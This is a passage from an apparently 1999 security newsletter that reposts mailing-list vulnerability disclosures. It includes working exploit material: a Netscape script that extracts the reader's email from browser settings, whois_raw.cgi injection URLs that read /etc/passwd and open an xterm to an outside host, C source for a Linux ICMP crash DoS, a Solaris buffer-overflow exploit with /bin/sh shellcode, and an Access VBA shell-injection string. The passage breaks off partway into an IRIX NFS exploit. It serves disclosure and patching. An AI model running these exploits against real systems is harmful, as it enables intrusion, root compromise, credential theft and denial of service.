Georgi Guninski
http://www.nat.bg/~joro
http://www.whitehats.com/guninski
[ Part 2: "Attached Text" ]
[ The following text is in the "koi8-r" character set. ]
[ Your display is set for the "US-ASCII" character set. ]
[ Some characters may be displayed incorrectly. ]
There is a security vulnerability in Netscape Communicator 4.6 Win95, 4.07 Linux (probably all 4.x versions) in the way it
works with "view-source:wysiwyg://1/javascript" URLs. It parses them in a "view-source" window. The problem is that it
allows access to documents included in the parent document via ILAYER SRC="view-source:wysiwyg://1/" using find(). That
allows reading the whole parsed document.
Vulnerabilites:
_________________________________________________________________________________________________________________________________
Browsing local directories
Reading user's cache
Reading parsed HTML files
Reading Netscape's configuration ("about:config") including user's email address, mail servers and password.
Probably others
This vulnerability may be exploited by using HTML email message.
_________________________________________________________________________________________________________________________________
Workaround: Disable JavaScript
_________________________________________________________________________________________________________________________________
This demonstration tries to find your email address, it may take some time.
Written by Georgi Guninski
_________________________________________________________________________________________________________________________________
s="view-source:wysiwyg://1/javascript:s='vvvv>&>"" +"" +" blur();msg1=\"Your email is: \";
mend=\"general.\"+\"title_tips\";mag=\"mail.identity.useremail\"+\" = \";sp=\" \";res=mag;charstoread=50;" +"setTimeout(\"
" +"for(i=0;i'"; //a=window.open(s); location=s;
-----------------------------------------------------------------------------------------------------
<http://www.nat.bg/~joro/viewsource.html>
<HTML>
<BODY>
There is a security vulnerability in Netscape Communicator 4.6 Win95, 4.07 Linux (probably all 4.x versions) in the way
it works with "view-source:wysiwyg://1/javascript" URLs. It parses them in a "view-source" window.
The problem is that it allows access to documents included in the parent document via
ILAYER SRC="view-source:wysiwyg://1/" using find(). That allows reading the whole parsed document.
<BR>
Vulnerabilites:
<HR>
Browsing local directories<BR>
Reading user's cache<BR>
Reading parsed HTML files<BR>
Reading Netscape's configuration ("about:config") including user's email address, mail servers and password.<BR>
Probably others<BR>
<BR>
This vulnerability may be exploited by using HTML email message.
<HR>
Workaround: Disable JavaScript
<HR>
This demonstration tries to find your email address, it may take some time.
<BR><BR>
<A HREF="Written">http://www.nat.bg/~joro">Written by Georgi Guninski</A>
<HR>
<SCRIPT>
s="view-source:wysiwyg://1/javascript:s='<TITLE>tttt</TITLE>vvvv>>"
+"<ILAYER SRC=\"view-source:wysiwyg://1/about:config\"></ILAYER>"
+" <SCRIPT>blur();msg1=\"Your email is: \"; mend=\"general.\"+\"title_tips\";mag=\"mail.identity.useremail\"+\" = \";sp=\" \";res=mag;charstoread=50;"
+"setTimeout(\" "
+"for(i=0;i<charstoread;i++) {"
+" t=res;"
+" find(mend);"
+" for(c=1;c<256;c++) {"
+" t=res + String.fromCharCode(c);"
+" if (find(t,true,true)) {"
+" res=t;"
+" if (c==32) i=charstoread+1"
+" } "
+" }"
+"}"
+"res=res.substring(mag.length);"
+"alert(msg1 + res);"
+" ;\",3000);</"+"SCRIPT>'";
//a=window.open(s);
location=s;
</SCRIPT>
@HWA
17.0 Vulnerability in Broker FTP Server v. 3.0 Build 1
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From PacketStorm http://www.genocide2600.com/~tattooman/new.shtml
Date: Tue, 1 Jun 1999 07:24:24 +0200
From: Arne Vidstrom <winnt@BAHNHOF.SE>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Vulnerability in Broker FTP Server v. 3.0 Build 1
Hi,
I've found a vulnerability in Broker FTP Server v. 3.0 Build 1. Here's an
example:
You have it installed with FTP root in c:\FTProot and you have a user
"test" with home directory in c:\FTProot\test. You also have checked the
"Display as ROOT directory" checkbox for test, so he/she can't get below
the home directory. CWD won't take him/here below it, but LIST will:
LIST ..\..\winnt\
will list the contents of c:\winnt and
NLST ..\..\winnt\
will also list the contents of c:\winnt. Of course this isn't as bad as if
CWD or RETR had worked, but you probably don't want anybody to be able to
look around in your private directories... I've contacted Transsoft about
this, and they should have released a new version that fixed this more than
a week ago. I've contacted them again but they haven't given me a reply
this time.
/Arne Vidstrom
@HWA
18.0 whois_raw.cgi problem
~~~~~~~~~~~~~~~~~~~~~
From PacketStorm http://www.genocide2600.com/~tattooman/new.shtml
Date: Tue, 1 Jun 1999 00:34:51 +0200
From: Salvatore Sanfilippo -antirez- <md5330@MCLINK.IT>
To: BUGTRAQ@netspace.org
Subject: whois_raw.cgi problem
Hi,
sorry if this has already been known.
There is a problem in whois_raw.cgi, called from
whois.cgi. whois_raw.cgi is part of cdomain v1.0.
I don't know if new versions are vulnerable.
#!/usr/bin/perl
#
# whois_raw.cgi Written by J. Allen Hatch (zone@berkshire.net)
# 04/17/97
#
# This script is part of the cdomain v1.0 package which is available at:
# http://www.your-site.com/~zone/whois.html
...
require ("/usr/lib/perl5/cgi-lib.pl");
...
$fqdn = $in{'fqdn'};
# Fetch the root name and concatenate
# Fire off whois
if ($in{'root'} eq "it") {
@result=`$whois_cmd_it $fqdn`;
} elsif ($in{'fqdn'} eq "alicom.com" || $in{'fqdn'} eq "alicom.org") {
@result="Dettagli non disponibili per il dominio richiesto.";
} else {
@result=`$whois_cmd $fqdn`;
}
...
The exploit is banal and well known problem:
http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0A/usr/X11R6/bin/xterm%20-display%20graziella.lame.org:0
bye,
antirez
--
Salvatore Sanfilippo antirez | md5330@mclink.it | antirez@alicom.com
try hping: http://www.kyuzz.org/antirez antirez@seclab.com
'se la barca non ce l'hai dove uzba te ne vai?
se la barca te la ruba, preo.' (M. Abruscato & O. Carmeci)
---------------------------------------------------------------------------------
Date: Wed, 2 Jun 1999 00:16:42 +0200
From: Peter van Dijk <peter@ATTIC.VUURWERK.NL>
To: BUGTRAQ@netspace.org
Subject: Re: whois_raw.cgi problem
On Tue, Jun 01, 1999 at 12:34:51AM +0200, Salvatore Sanfilippo -antirez- wrote:
> Hi,
>
> sorry if this has already been known.
>
> There is a problem in whois_raw.cgi, called from
> whois.cgi. whois_raw.cgi is part of cdomain v1.0.
> I don't know if new versions are vulnerable.
Version 2.0 is just as vulnerable.
The commercial version (the one that runs on NT too :) is _not_ vulnerable
since it does it's own socket thing instead of starting 'whois'.
I've known of this bug in cdomain for about 6 months but never got around
to writing up an advisory...
Greetz, Peter
--
| 'He broke my heart, | Peter van Dijk |
I broke his neck' | peter@attic.vuurwerk.nl |
nognikz - As the sun | Hardbeat@ircnet - #cistron/#linux.nl |
| Hardbeat@undernet - #groningen/#kinkfm/#vdh |
---------------------------------------------------------------------------------
Date: Wed, 2 Jun 1999 01:06:22 +0200
From: Peter van Dijk <peter@ATTIC.VUURWERK.NL>
To: BUGTRAQ@netspace.org
Subject: Re: whois_raw.cgi problem
On Wed, Jun 02, 1999 at 12:16:42AM +0200, Peter van Dijk wrote:
> On Tue, Jun 01, 1999 at 12:34:51AM +0200, Salvatore Sanfilippo -antirez- wrote:
> > Hi,
> >
> > sorry if this has already been known.
> >
> > There is a problem in whois_raw.cgi, called from
> > whois.cgi. whois_raw.cgi is part of cdomain v1.0.
> > I don't know if new versions are vulnerable.
>
> Version 2.0 is just as vulnerable.
>
> The commercial version (the one that runs on NT too :) is _not_ vulnerable
> since it does it's own socket thing instead of starting 'whois'.
>
> I've known of this bug in cdomain for about 6 months but never got around
> to writing up an advisory...
To elaborate this a bit further: cdomain-free 2.4 and lower are
_vulnerable_. cdomain-free 2.5 and all commercial cdomain versions I've
seen are _not_ vulnerable, because they connect to the whois servers
themselves.
cdomain-free is available for download at www.cdomain.com.
Greetz, Peter
--
| 'He broke my heart, | Peter van Dijk |
I broke his neck' | peter@attic.vuurwerk.nl |
nognikz - As the sun | Hardbeat@ircnet - #cistron/#linux.nl |
| Hardbeat@undernet - #groningen/#kinkfm/#vdh |
@HWA
19.0 Linux kernel 2.2.x vulnerability/exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From PacketStorm http://www.genocide2600.com/~tattooman/new.shtml
Date: Tue, 1 Jun 1999 17:43:17 +0200
From: Piotr Wilkin <pwl@WOTAN.2SLO.WAW.PL>
To: BUGTRAQ@netspace.org
Subject: Linux kernel 2.2.x vulnerability/exploit
I'm sorry if this has been noticed before, but since I did't find anything
in the archives, I post it here.
There seems to be a bug in kernels 2.2.x (tested on 2.2.7 and 2.2.9), that
causes them to panic when they are sent a large number of specific ICMP
packages. I think the problem comes from the combination of the mangled
header length (shorter or longer ihl's don't cause hangup) and the random
ICMP packets (random type/subtype and source address) this program sends.
Windows 9x and FreeBSD 3.0 seem to be unaffected.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Here is the program source (under Linux):
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <arpa/inet.h>
#include <errno.h>
#include <unistd.h>
#include <netdb.h>
struct icmp_hdr
{
struct iphdr iph;
struct icmp icp;
char text[1002];
} icmph;
int in_cksum(int *ptr, int nbytes)
{
long sum;
u_short oddbyte, answer;
sum = 0;
while (nbytes > 1)
{
sum += *ptr++;
nbytes -= 2;
}
if (nbytes == 1)
{
oddbyte = 0;
*((u_char *)&oddbyte) = *(u_char *)ptr;
sum += oddbyte;
}
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return(answer);
}
struct sockaddr_in sock_open(char *address, int socket, int prt)
{
struct hostent *host;
if ((host = gethostbyname(address)) == NULL)
{
perror("Unable to get host name");
exit(-1);
}
struct sockaddr_in sin;
bzero((char *)&sin, sizeof(sin));
sin.sin_family = PF_INET;
sin.sin_port = htons(prt);
bcopy(host->h_addr, (char *)&sin.sin_addr, host->h_length);
return(sin);
}
void main(int argc, char **argv)
{
int sock, i, ctr, k;
int on = 1;
struct sockaddr_in addrs;
if (argc < 3)
{
printf("Usage: %s <ip_addr> <port>\n", argv[0]);
exit(-1);
}
for (i = 0; i < 1002; i++)
{
icmph.text[i] = random() % 255;
}
sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1)
{
perror("Can't set IP_HDRINCL option on socket");
}
if (sock < 0)
{
exit(-1);
}
fflush(stdout);
for (ctr = 0;ctr < 1001;ctr++)
{
ctr = ctr % 1000;
addrs = sock_open(argv[1], sock, atoi(argv[2]));
icmph.iph.version = 4;
icmph.iph.ihl = 6;
icmph.iph.tot_len = 1024;
icmph.iph.id = htons(0x001);
icmph.iph.ttl = 255;
icmph.iph.protocol = IPPROTO_ICMP;
icmph.iph.saddr = ((random() % 255) * 255 * 255 * 255) +
((random() % 255) * 65535) +
((random() % 255) * 255) +
(random() % 255);
icmph.iph.daddr = addrs.sin_addr.s_addr;
icmph.iph.frag_off = htons(0);
icmph.icp.icmp_type = random() % 14;
icmph.icp.icmp_code = random() % 10;
icmph.icp.icmp_cksum = 0;
icmph.icp.icmp_id = 2650;
icmph.icp.icmp_seq = random() % 255;
icmph.icp.icmp_cksum = in_cksum((int *)&icmph.icp, 1024);
if (sendto(sock, &icmph, 1024, 0, (struct sockaddr *)&addrs, sizeof(struct sockaddr)) == -1)
{
if (errno != ENOBUFS) printf("X");
}
if (ctr == 0) printf("b00m ");
fflush(stdout);
}
close(sock);
}
--------------------------------------------------------------------------------
Date: Tue, 1 Jun 1999 23:30:33 +0100
From: Alan Cox <alan@LXORGUK.UKUU.ORG.UK>
To: BUGTRAQ@netspace.org
Subject: Linux 2.2 DoS attack
Ok problem confirmed. Its not icmp however - in fact the program given
has some bugs that cause it. If it had been a correctly written icmp tester
it wouldnt have worked. A blessing in disguise.
Anyway the fix seems to be this. Sorry it took so long to sort out.
--- ../linux.vanilla/net/ipv4/ip_options.c Wed May 12 16:49:38 1999
+++ net/ipv4/ip_options.c Tue Jun 1 22:11:46 1999
@@ -452,7 +452,6 @@
error:
if (skb) {
icmp_send(skb, ICMP_PARAMETERPROB, 0, htonl((pp_ptr-iph)<<24));
- kfree_skb(skb);
}
return -EINVAL;
}
Alan
@HWA
20.0 New Allaire Security Bulletin (ASB99-09)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From PacketStorm http://www.genocide2600.com/~tattooman/new.shtml
Date: Tue, 1 Jun 1999 11:45:35 -0700
From: aleph1@UNDERGROUND.ORG
To: BUGTRAQ@netspace.org
Subject: New Allaire Security Bulletin (ASB99-09)
Dear Allaire Customer --
We have recently become aware of a serious security vulnerability that may affect
customers using Microsoft Access with ColdFusion. This issue is not a problem with
ColdFusion, but can occur when using some versions of the Microsoft Access ODBC driver.
We have created a new Allaire Security Bulletin that documents this issue and the steps
that customers can take to protect themselves. If you are using Microsoft Access with
your Web applications we strongly recommend that you review this new bulletin:
ASB99-09: Solutions to Issues that Allow Users to Execute Commands through
Microsoft Access
You can find this new bulletin and information about other security issues in the
Allaire Security Zone:
http://www.allaire.com/security
As a Web application platform vendor, one of our highest concerns is the security
of the systems our customers deploy. We understand how important security is to
our customers, and we're committed to providing the technology and information customers
need to build secure Web applications. Allaire has set up an email address that customers
can use to report security issues associated with an Allaire product: secure@allaire.com.
Thank you for your time and consideration on this issue.
-- Allaire Security Response Team
----------------------------------------------------------------------------------------
<http://www.allaire.com/handlers/index.cfm?ID=11069&Method=Full>
Allaire Security Bulletin (ASB99-09)
Solutions to Issues that Allow Users to Execute Commands through Microsoft Access
Originally Posted: June 1, 1999
Last Updated: June 1, 1999
Summary
Some Microsoft ODBC drivers for Microsoft Access may allow users to execute Visual Basic
for Applications (VBA) commands on the hosted server without permission. URL, form and
cookie variables in a dynamic query in many development environments (e.g. ColdFusion, ASP,
CGI, etc.) can be used to exploit this hole appending malicious VBA statements to existing
queries. This problem can be easily fixed by upgrading to the Microsoft ODBC driver for Access
included in MDAC 2.1 sp1a, available from Microsoft. In general, Allaire recommends that
customers use proper coding methods for validating dynamic query variables passed on URL
strings, http forms or cookies. This is not a security issue with ColdFusion itself. However,
ColdFusion customers using Access are vulnerable to this issue. (This issue is similar to the
vulnerabilities documented in ASB99-04, which are associated with appending malicious SQL
statements to query strings sent to some enterprise databases.)
Issue
In a Web application there are often circumstances where queries are built dynamically using
variables that are passed on URLs or in forms. Some versions of the Microsoft Access ODBC
driver support the ability to append VBA commands to a SQL string. As a result, a malicious
attack could be made by using URL, form or cookie variables to send VBA commands through a
query. These VBA commands could potentially be used to damage the server or to gain
unauthorized access to information and systems. (The potential for a similar problem using SQL
statements and some enterprise database was documented in ASB99-04).
Some versions of the Microsoft Access ODBC driver allow for appending VBA commands to a
SQL string. The VBA commands are appended by using the pipe character, or Chr(124), which
is treated as a reserved character by the Access ODBC driver. See the following MS
Knowledge Base article for details:
http://support.microsoft.com/support/kb/articles/q147/6/87.asp
This reserved character allows users to modify a URL, form or cookie variable to execute VBA
commands against the Web server using the ODBC driver. The following string is an example
of one that can be used to initiate an attack by writing a file to the web servers hard drive:
'|shell("cmd /c 1 > c:\temp\foo.txt")|'
This string could be passed to an application using a URL variable, so the page could be called
as follows:
http://myserver/page.cfm?x='|shell("cmd /c 1 > c:\temp\foo.txt")|'
This code, when executed as part of the following dynamically created query, will cause a file to
be created at the location c:\temp\foo.txt.
<CFQUERY name="getUsers2" DATASOURCE="test1">
SELECT *
FROM USERS
WHERE lname = '#URL.X#'
</CFQUERY>
This code could also be vulnerable when processing form input from a template using a form
variable called 'X'. Please note that you should always validate user-initiated input, including
URL, form, and cookie variables.
Affected Software Versions
ColdFusion Server (all versions and editions) running with Microsoft Access through
ODBC
What Allaire is Doing
This issue is not a problem with ColdFusion, but can occur when using Microsoft Access and
some versions for the Access ODBC driver. It is not a problem with ColdFusion, but it can
affect ColdFusion applications that use Access. To respond to this issue, Allaire has published
an Allaire Security Bulletin (ASB99-09) notifying customers of the problem and remedies that
can be used to address it. We have sent a notification of the bulletin to customers who have
subscribed to Allaire Security Notifications.
What Customers Should Do
This issue appears to be fixed by the installation of the Microsoft Access ODBC driver included
with MDAC 2.1 sp1a. We strongly recommend that customers install this ODBC driver. It
should not adversely affect the functionality of ColdFusion applications using Access. This
MDAC can be downloaded from the Microsoft site:
http://download.microsoft.com/msdownload/mdac/sp1a/x86/en/mdac_typ.exe
In addition, Allaire recommends that customers write their code to validate variables that are
passed into SQL statements, configure their database security properly, and use standard
database application development practices such as stored procedures where appropriate to
protect themselves. These are general requirements of production applications regardless of the
development platform.
There are many ways to address the issues raised by the risk of malicious SQL statements being
inserted into dynamic queries. The Allaire Technical Brief Securing Databases for ColdFusion
Applications, details some of the steps you can take to secure your databases.
It is important to note that each individual application may require its own particular steps in
both coding and database configuration in order to be fully secured. Some of the techniques
for securing database applications built with ColdFusion are detailed in the Allaire Technical Brief
- Securing Databases for ColdFusion Applications.
Revisions
June 1, 1999 -- Bulletin first released.
Reporting Security Issues
Allaire is committed to addressing security issues and providing customers with the information
on how they can protect themselves. If you identify what you believe may be a security issue
with an Allaire product, please send an email to secure@allaire.com. We will work to
appropriately address and communicate the issue.
Receiving Security Bulletins
When Allaire becomes aware of a security issue that we believe significantly affects our products
or customers, we will notify customers when appropriate. Typically this notification will be in the
form of a security bulletin explaining the issue and the response. Allaire customers who would
like to receive notification of new security bulletins when they are released can sign up for our
security notification service.
For additional information on security issues at Allaire, please visit:
http://www.allaire.com/security
THE INFORMATION PROVIDED BY ALLAIRE IN THIS BULLETIN IS PROVIDED "AS IS"
WITHOUT WARRANTY OF ANY KIND. ALLAIRE DISCLAIMS ALL WARRANTIES, EITHER
EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL ALLAIRE CORPORATION
OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT,
INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL
DAMAGES, EVEN IF ALLAIRE CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED
OF THE POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE
EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL
DAMAGES SO THE FOREGOING LIMITATION MAY NOT APPLY.
@HWA
21.0 sdtcm_convert Overflow Exploits( for Intel Solaris 7)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From PacketStorm http://www.genocide2600.com/~tattooman/new.shtml
*=============================================================================
sdtcm_convert Overflow Exploits( for Intel Solaris 7)
The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551)
Written by UNYUN (unewn4th@usa.net)
[usage]
% gcc ex_sdtcm_convert86.c (This example program)
% a.out
If no response, hit ctrl+c
#
=============================================================================
*/
#define ADJUST 1
#define OFFSET0 6268
#define OFFSET1 4400
#define LENGTH1 600
#define OFFSET2 5000
#define LENGTH2 3000
#define OFFSET3 6000
#define NOP 0x90
char exploit_code[] =
"\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0"
"\x8d\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff"
"\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0"
"\x17\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff"
"\x55\x8b\xec\x83\xec\x08\xeb\x50\x33\xc0\xb0\x3b\xeb\x16\xc3\x33"
"\xc0\x40\xeb\x10\xc3\x5e\x33\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88"
"\x7e\x06\xeb\x05\xe8\xec\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f"
"\xc3\x5e\x33\xc0\x89\x76\x08\x88\x46\x07\x89\x46\x0c\x50\x8d\x46"
"\x08\x50\x8b\x46\x08\x50\xe8\xbd\xff\xff\xff\x83\xc4\x0c\x6a\x01"
"\xe8\xba\xff\xff\xff\x83\xc4\x04\xe8\xd4\xff\xff\xff/bin/sh";
unsigned long get_sp(void)
{
__asm__(" movl %esp,%eax ");
}
unsigned long ret_adr;
int i;
main()
{
static char x[11000];
putenv("LANG=");
memset(x,'a',10000);
ret_adr=get_sp()-OFFSET0;
for (i = 0; i < 5000 ; i+=4){
x[i+0]=ret_adr & 0xff;
x[i+1]=(ret_adr >> 8 ) &0xff;
x[i+2]=(ret_adr >> 16 ) &0xff;
x[i+3]=(ret_adr >> 24 ) &0xff;
}
ret_adr=get_sp()-11700;
if ((ret_adr & 0xff )==0) ret_adr+=4;
printf("Jumping Address = %lx\n",ret_adr);
for (i = OFFSET1+ADJUST; i < OFFSET1+LENGTH1 ; i+=4){
x[i+0]=ret_adr & 0xff;
x[i+1]=(ret_adr >> 8 ) &0xff;
x[i+2]=(ret_adr >> 16 ) &0xff;
x[i+3]=(ret_adr >> 24 ) &0xff;
}
for (i = OFFSET2; i <OFFSET2+LENGTH2 ; i++) x[i]=90;
for (i=0;i<strlen(exploit_code);i++) x[OFFSET3+ADJUST+i]=exploit_code[i];
x[10000]=0;
printf("\n\nIf you can not get prompt, please hit CTRL+C\n\n\n");
execl("/usr/dt/bin/sdtcm_convert", "sdtcm_convert", "-d",x,"test",(char *) 0);
}
@HWA
22.0 ActiveState Security Advisory
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From PacketStorm http://www.genocide2600.com/~tattooman/new.shtml
Date: Mon, 31 May 1999 07:16:53 -0700
From: Michael Smith <support@ACTIVESTATE.COM>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: ActiveState Security Advisory
Problem
--------
PerlScript and Perl-ISAPI that come with ActivePerl 516 and earlier
versions, inadequately check the length of path information sent to open().
Due to limits on path and filename length in Windows, this can crash IIS
if sufficiently large strings are provided as paths or filenames.
Solution
---------
This is fixed in ActivePerl 517
Work Around
------------
If you are unable to upgrade to ActivePerl 517 then all path information
should be checked for sane lengths before being passed to open(). The
maximum length of a path, including drive, directory and filename is 259
characters. The maximum length of the filename portion of a path is 255
characters. The maximum length of the directory portion of a path is 255
characters.
example:
$filename = substr $filename, 0, 255;
open FOO, ">$filename";
General Comments
-----------------
Care should be taken when accepting input from users, especially in a web
context where users are untrusted and relatively anonymous. When designing
CGI scripts some thought should be given to checking user input for sane
values. Use of taint mode and warnings (-t and -w) are also highly
recommended.
The Activators.
@HWA
23.0 Exploit in Internet Explorer 5.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From PacketStorm http://www.genocide2600.com/~tattooman/new.shtml
Date: Mon, 31 May 1999 16:18:02 GMT
From: THR - <thr_@HOTMAIL.COM>
To: BUGTRAQ@netspace.org
Subject: Exploit in Internet Explorer 5.0
Hi everyone!
I have found a bug which will freeze Internet Explorer 5.0
I know that there are *many* bugs that will crasch browsers
but what makes this one special is the following:
In IE 5.0 Microsoft has fixed the bugs from IE 4.0 that
was based on infinit loops in JavaScript. If a JavaScript
contains a loop which will cause IE 5.0 to run slowly
or be unresponsive, the user will be warned and he/she will
be prompted whether the JavaScript should be aborted or
not. This exploit is a JavaScript which changes the bgColor in
an infinit loop and when you open it you wont get a warning.
The browser will just freeze!
Get the source code here: http://members.xoom.com/thr_/my/color.txt
//THR
WWW: http://fly.to/unixhacking
---------------------------------------------------------------------
<http://members.xoom.com/thr_/my/color.txt>
24/5 1999
This is a new exploit which affects Microsoft Internet Explorer 5.0.
When you enter the html document below, IE will freeze and you have to
close it with ctrl + alt + del.
//THR
WWW: http://fly.to/unixhacking
-----------Cut here------color.htm--------Start---------
<HTML>
<BODY>
<SCRIPT>
var color = new Array;
color[1] = "black";
color[2] = "white";
for(x = 0; x <3; x++)
{
document.bgColor = color[x]
if(x == 2)
{
x = 0;
}
}
</SCRIPT>
</BODY>
</HTML>
-----------Cut here------color.htm--------End---------
@HWA
24.0 IRIX 6.5 nsd virtual filesystem vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From PacketStorm http://www.genocide2600.com/~tattooman/new.shtml
Date: Mon, 31 May 1999 03:56:37 -0400
From: "Jefferson Ogata (JO317)" <ogata@POBOX.COM>
To: BUGTRAQ@netspace.org
Subject: IRIX 6.5 nsd virtual filesystem vulnerability
I've been waiting since February for SGI to post an advisory about this.
Enough.
/******************************************************************************
IRIX 6.5 nsd virtual filesystem exploit
Author: Jefferson Ogata (JO317) <ogata@pobox.com>
Please note that this program comes with NO WARRANTY WHATSOEVER. Your use
of this program constitutes your complete acceptance of all liability for
any damage or loss caused by the aforesaid use. It is provided to the
network community solely to document the existence of a vulnerability
in the security implementations of certain versions of IRIX, and may not
be used for any illicit purpose. Many of the details of the bug this
program exploits have been available to users of SGI's online support
system since February 1999. The current revision of IRIX (6.5.3) corrects
this bug, at least enough to stop this particular exploit, and I strongly
encourage you to bring your systems up to date as quickly as possible.
With IRIX 6.5, SGI has moved all name services, NIS services, and DNS
lookups into a userland process called nsd, which exports the results of
the queries it fields into a virtual filesystem. The virtual filesystem is
normally mounted onto the directory /ns by the program /sbin/nsmount, which
is invoked by nsd on startup. The nsd daemon itself is exporting the
filesystem via NFS3 over a dynamically bound UDP port -- rather than a
well-known or settable one -- typically in the 1024-1029 range. On a
desktop system, 1024 is a good bet, since nsd is usually the first
RPC/UDP service to be started.
The NFS filesystem is not registered with mountd, so there is no way to
query mountd for a mount filehandle. But because the NFS port is fairly
easy to discover through port scanning, and because the mount filehandle
nsd uses is simply a string of 32 zeroes, it is trivial to mount the nsd
filesystem from a host anywhere on the Internet. nsd will serve an array
of NFS requests to anyone. Furthermore, because the service's NFS port is
bound dynamically, it is difficult to protect it with a firewall; it may
change from one system start to another, or if the daemon is killed and
restarted.
This program can successfully mount the nsd-exported virtual filesystem
>from a remote host onto a machine running IRIX 6.4 or higher. It makes use
of the MS_DOXATTR mount flag defined in IRIX 6.4 and higher. I do not know
what this flag does at the NFS protocol level, but it allows the client to
ask the NFS server not to enforce certain permissions controls against the
client. I don't know whether any other vendor NFS client systems support
this flag. A clever person might write a userland NFS client that would
accept an initial handle, NFS port, etc. as arguments.
On an SGI with SGI C compiler, compile with:
cc -o nsdadv nsdadv.c
Run it this way:
nsdadv /mnt sucker.example.com 1024
with obvious substitutions.
So what are the security implications of this? Well, at the very least, the
nsd filesystem on an NIS server reveals the NIS domain name, and what maps
it contains, as well as what classes are being used.
By exploring the filesystem shortly after it has been mounted I have been
able to retrieve data that should be hidden from me, including shadow
password entries from a remote system's shadow file.
Beyond retrieving keys and maps, you can also monitor the filesystem for
changes. A great deal of information is leaked through the contents of the
nsd filesystem. For example, if host A looks up a host B's IP address, a
file named B will appear in the /.local/hosts.byname directory in A's nsd
filesystem. The file's contents will be the IP address.
By the way, though you be unable to chdir into a particular location in
the nsd filesystem, you may yet succeed under slightly different
conditions. Eventually you can do it. I'm not sure why or when, but nsd
gets picky sometimes. Eventually it relents. Specifically, I've found that
the entire nsd filesystem appears readable for a few seconds after it is
initially mounted. If you can't look at something, unmount the filesystem,
remount it, and try again immediately. It also seems that a stat() is
sometimes required before a chdir(). Your mileage may vary, but keep
trying. You may wish to write a script to mount the nsd filesystem, explore
and take inventory of its contents, and unmount the filesystem quickly.
Once you've chdir'd into a directory, it appears you can always read it,
although you can't necessarily stat its contents. This suggests a strategy
of spawning a group of processes each with its cwd set to a subdirectory of
the nsd filesystem, in order to retain visibility on the entire filesystem.
Each process would generate an inventory of its cwd, and then monitor it
for changes. A Perl script could do this well.
Another thing: it is possible to create an empty file in nsd's exported
filesystem simply by stat()ing a nonexistent filename. This suggests a
potential DoS by creating many files in a directory.
Remember that the system keeps a local cache in /var/ns, so you may have
to wait for cached entries on the target host to expire before you'll see
them reappear in the virtual filesystem.
For some fairly extensive info on the nsd implementation, take a look at:
http://www.bitmover.com/lm/lamed_arch.html
******
What got me into all this was that I found I could no longer run services
chrooted if they required DNS. It took considerable effort to come up with
a solution to this. This was a fundamental change from IRIX 6.4, and I know
I'm not the only one who finds the nsd implementation to be a generally
unpleasant direction, in part because it causes umount -t nfs to break
system database services. I give SGI points for creativity -- in one sense,
using NFS as a database access system is a very slick approach. But the
database needs a security model, and the model needs to be implemented
correctly. Neither of these needs appears to have been met.
So how could SGI fix this?
Without going back, SGI could at least make nsd respond only to queries
>from localhost (see note below about IRIX 6.5.3). The problem here is that
they actually intend to support remote mounts in later releases, in order
to supplement or supplant other means of distribution. The web documents
indicate this.
They could create a well-randomized mount filehandle for the filesystem
and pass that to nsmount. Then you couldn't remotely mount the filesystem
without guessing the handle -- nontrivial with a 32-byte handle.
At the very least, they should provide libraries of regular BIND resolver
routines, file-based getpwent, etc. routines, so one could choose the
resolution strategy at link time, perhaps by modifying the shared library
path.
******
With IRIX release 6.5.3, SGI appears to have fixed this problem, at least
to some degree. The exploit does not appear to work as it does against
6.5.2. Further testing is needed, and the behavior should be watched
carefully in future versions of IRIX.
******************************************************************************/
#include <stdio.h>
#include <string.h>
#include <malloc.h>
#include <mntent.h>
#include <sys/types.h>
#include <rpc/types.h>
#include <sys/fstyp.h>
#include <sys/fsid.h>
#include <sys/mount.h>
#include <sys/fs/nfs.h>
#include <sys/fs/nfs_clnt.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>
/* Filesystem type name for nsd-exported filesystem. */
#define NSD_FSTYPE "nfs3"
/* File the records mounted filesystems. */
#define MTAB_FILE "/etc/mtab"
